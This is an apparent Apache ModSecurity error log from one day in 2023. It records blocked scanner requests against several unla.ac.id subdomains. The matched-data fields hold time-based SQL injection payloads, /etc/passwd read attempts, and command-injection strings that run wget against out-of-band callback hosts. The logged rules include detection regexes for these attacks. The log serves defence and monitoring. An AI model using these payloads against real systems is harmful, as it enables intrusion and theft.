[Tue Aug 29 11:31:29.524830 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQOv2cAAAAw"]
[Tue Aug 29 11:31:29.528124 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQTKH8AAAA1"]
[Tue Aug 29 11:31:29.544262 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQOv2gAAAAw"]
[Tue Aug 29 11:31:29.552333 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQNwGkAAAAv"]
[Tue Aug 29 11:31:29.582814 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQR458AAAAz"]
[Tue Aug 29 11:31:29.590433 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAPahzUAAAAL"]
[Tue Aug 29 11:31:29.593614 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAP6NOIAAAAQ"]
[Tue Aug 29 11:31:30.302303 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQFcS0AAAAn"]
[Tue Aug 29 11:31:30.317696 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQQylwAAAAy"]
[Tue Aug 29 11:31:30.318803 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQSWMYAAAA0"]
[Tue Aug 29 11:31:30.321371 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQLDAAAAAAt"]
[Tue Aug 29 11:31:30.324177 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQTKIIAAAA1"]
[Tue Aug 29 11:31:30.331930 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10osCo-f0AAAPahzcAAAAL"]
[Tue Aug 29 11:31:30.369212 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQgqUUAAAAA"]
[Tue Aug 29 11:31:30.406543 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQSWMgAAAA0"]
[Tue Aug 29 11:31:31.304245 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgdiyqw4pbhi1ps.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQR46IAAAAz"]
[Tue Aug 29 11:31:31.352356 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlggdysmwcjnd16w.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQgqUcAAAAA"]
[Tue Aug 29 11:31:31.356510 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10o8Co-f0AAAQDFUMAAAAl"]
[Tue Aug 29 11:31:31.368343 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10o8Co-f0AAAP5mJIAAAAM"]
[Tue Aug 29 11:31:31.376557 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgd418a8fktopdj.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQDFUQAAAAl"]
[Tue Aug 29 11:31:31.382675 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgoqb8ft8kja4x9.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAP6NOYAAAAQ"]
[Tue Aug 29 11:31:31.387598 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgphybnpnshcmxx.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAPDn7IAAAAP"]
[Tue Aug 29 11:31:31.390623 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg9g4z77ra13xkz.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAPahzsAAAAL"]
[Tue Aug 29 11:31:32.335586 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQJWtQAAAAr"]
[Tue Aug 29 11:31:32.358543 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAPahz0AAAAL"]
